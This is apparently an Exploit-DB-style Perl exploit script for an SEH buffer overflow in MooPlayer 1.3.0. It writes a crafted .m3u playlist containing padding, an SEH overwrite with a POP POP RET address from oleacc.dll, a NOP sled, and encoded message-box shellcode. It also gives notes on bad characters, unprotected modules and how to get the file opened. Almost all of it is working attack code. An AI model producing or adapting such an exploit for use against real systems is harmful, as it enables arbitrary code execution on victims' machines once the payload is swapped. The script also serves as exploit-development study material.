MooPlayer 1.3.0 'm3u' SEH Buffer Overflow

#!/usr/bin/perl

###########################################################################=

#################################

# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow

# Date: 09-02-2015

# Exploit Author: Tomislav Paskalev

# Vulnerable Software: MooPlayer v1.3.0

# Vendor Homepage: https://mooplayer.jaleco.com/

# Software Link: http://www.exploit-db.com/apps/a2eba48a6789803f2a3aca8c93b=86cb7-mooplayer-1.3.0.zip

# Version: 1.3.0

# Tested on: Windows XP SP2 EN

# OSVDB-ID: 118128

###########################################################################=

#################################

# Credits:

# Vulnerability identified by Samandeep Singh

# http://www.exploit-db.com/exploits/36022/

###########################################################################=

#################################

# Exploit notes:

# mooplayer.exe was not compiled with SafeSEH, but always contains \x00 (bad character)

# available and could be used, which would make the exploit work across multiple OS

# versions, but the shellcode space would be limited since \x00 would terminate the string

# other available modules (Win XP SP2 EN) - enough space for larger shellcode

# oledlg.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)

# OLEACC.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)

###########################################################################=

#################################

# Bad characters:

# "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09"

# "\x0b\x0c"

# "\x0e\x0f"

# "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19"

# "\x1a\x1b\x1c\x1d\x1e\x1f"

###########################################################################=

#################################

# How to exploit:

# MooPlayer -> File -> Open Media File -> Files of type: Playlists -> (navigate to created exploit

# file) -> Open

# OR drag and drop created exploit file into MooPlayer

###########################################################################=

#################################

# Thanks to:

# Samandeep Singh (PoC)

# Peter Van Eeckhoutte (exploit development tutorials)

# Offensive Security (IT security courses, admin support)

###########################################################################=

#################################

$file = "MooPlayer_messagebox.m3u";

my $junk = "A" x 264;

my $nextSEH = "\xeb\x20\x90\x90"; # jump over the next 32 bytes

my $SEH = pack('V',0x74c96950); # POP POP RET from oleacc.dll (Win XP SP2 EN)

my $NOPs = "\x90" x 100;

# msfpayload windows/messagebox

# msfencode -e x86/alpha_upper

my $shellcode =

"\x89\xe5\xd9\xf7\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" .

"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .

"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .

"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .

"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4e\x39\x5a" .

"\x4b\x4d\x4b\x38\x59\x54\x34\x46\x44\x5a\x54\x46\x51\x39" .

"\x42\x58\x32\x53\x47\x36\x51\x4f\x39\x32\x44\x4c\x4b\x44" .

"\x31\x46\x50\x4c\x4b\x33\x46\x44\x4c\x4c\x4b\x44\x36\x35" .

"\x4c\x4c\x4b\x57\x36\x55\x58\x4c\x4b\x53\x4e\x31\x30\x4c" .

"\x4b\x50\x36\x46\x58\x50\x4f\x52\x38\x54\x35\x4c\x33\x36" .

"\x39\x53\x31\x58\x51\x4b\x4f\x4d\x31\x45\x30\x4c\x4b\x42" .

"\x4c\x57\x54\x47\x54\x4c\x4b\x57\x35\x57\x4c\x4c\x4b\x31" .

"\x44\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x55" .

"\x48\x4c\x4b\x31\x4a\x31\x30\x55\x51\x5a\x4b\x4b\x53\x56" .

"\x54\x30\x49\x4c\x4b\x50\x34\x4c\x4b\x33\x31\x5a\x4e\x50" .

"\x31\x4b\x4f\x56\x51\x59\x50\x4b\x4c\x4e\x4c\x4b\x34\x59" .

"\x50\x53\x44\x55\x57\x49\x51\x38\x4f\x34\x4d\x33\x31\x59" .

"\x57\x4a\x4b\x4c\x34\x47\x4b\x43\x4c\x57\x54\x51\x38\x34" .

"\x35\x4d\x31\x4c\x4b\x31\x4a\x47\x54\x45\x51\x4a\x4b\x55" .

"\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x4a\x35\x4c\x33" .

"\x31\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x33\x31\x4b\x58\x4c" .

"\x49\x30\x44\x51\x34\x35\x4c\x55\x31\x38\x43\x4e\x52\x44" .

"\x48\x57\x59\x59\x44\x4d\x59\x4a\x45\x4b\x39\x39\x52\x35" .

"\x38\x4c\x4e\x30\x4e\x44\x4e\x4a\x4c\x50\x52\x4d\x38\x4d" .

"\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4b\x39\x30\x45\x34\x44\x4f" .

"\x4b\x33\x4e\x49\x48\x4d\x32\x33\x43\x4d\x57\x55\x4c\x51" .

"\x34\x51\x42\x4b\x58\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d" .

"\x59\x37\x35\x53\x38\x33\x58\x32\x4c\x42\x4c\x37\x50\x37" .

"\x31\x43\x58\x50\x33\x37\x42\x36\x4e\x53\x54\x53\x58\x54" .

"\x35\x32\x53\x33\x55\x53\x42\x4b\x38\x31\x4c\x47\x54\x44" .

"\x4a\x4c\x49\x5a\x46\x50\x56\x4b\x4f\x31\x45\x53\x34\x4c" .

"\x49\x39\x52\x56\x30\x4f\x4b\x4e\x48\x4f\x52\x30\x4d\x4f" .

"\x4c\x4d\x57\x55\x4c\x31\x34\x56\x32\x4d\x38\x45\x31\x4b" .

"\x4f\x4b\x4f\x4b\x4f\x53\x58\x46\x38\x31\x30\x51\x30\x51" .

"\x30\x33\x58\x36\x34\x45\x35\x54\x33\x33\x44\x56\x51\x39" .

"\x4b\x4d\x58\x51\x4c\x47\x54\x34\x44\x4b\x39\x5a\x43\x43" .

"\x58\x52\x4e\x56\x4e\x31\x48\x31\x30\x55\x38\x53\x51\x34" .

"\x34\x42\x49\x52\x4f\x32\x48\x54\x30\x42\x4c\x42\x49\x43" .

"\x53\x33\x58\x35\x34\x37\x50\x35\x31\x34\x30\x45\x38\x32" .

"\x4f\x35\x39\x54\x34\x45\x35\x45\x38\x33\x55\x33\x48\x52" .

"\x50\x52\x4c\x45\x38\x44\x34\x32\x48\x35\x35\x57\x50\x53" .

"\x58\x57\x50\x52\x4f\x55\x36\x31\x30\x55\x38\x33\x44\x32" .

"\x45\x34\x38\x34\x34\x32\x48\x31\x30\x55\x33\x52\x4f\x42" .

"\x4e\x32\x48\x51\x30\x43\x44\x32\x48\x43\x55\x43\x58\x32" .

"\x4e\x31\x30\x42\x49\x42\x4e\x52\x48\x42\x55\x33\x44\x32" .

"\x49\x52\x4f\x55\x38\x43\x55\x33\x48\x42\x45\x42\x43\x35" .

"\x38\x52\x4f\x45\x34\x52\x45\x51\x30\x32\x48\x55\x35\x33" .

"\x54\x37\x50\x53\x53\x35\x38\x30\x47\x45\x31\x45\x39\x32" .

"\x4e\x30\x31\x39\x59\x4d\x58\x30\x4c\x57\x54\x50\x42\x4c" .

"\x49\x4b\x51\x30\x31\x58\x52\x42\x4a\x57\x30\x31\x43\x50" .

"\x51\x31\x42\x4b\x4f\x58\x50\x46\x51\x4f\x30\x50\x50\x4b" .

"\x4f\x50\x55\x45\x58\x41\x41";

# keep the exploit length consistent

my $endjunk = "\x90" x (10000 - length($junk.$nextSEH.$SEH.$NOPs.$shellcode));

open(myfile,">$file") ;

print myfile $junk.$nextSEH.$SEH.$NOPs.$shellcode.$endjunk;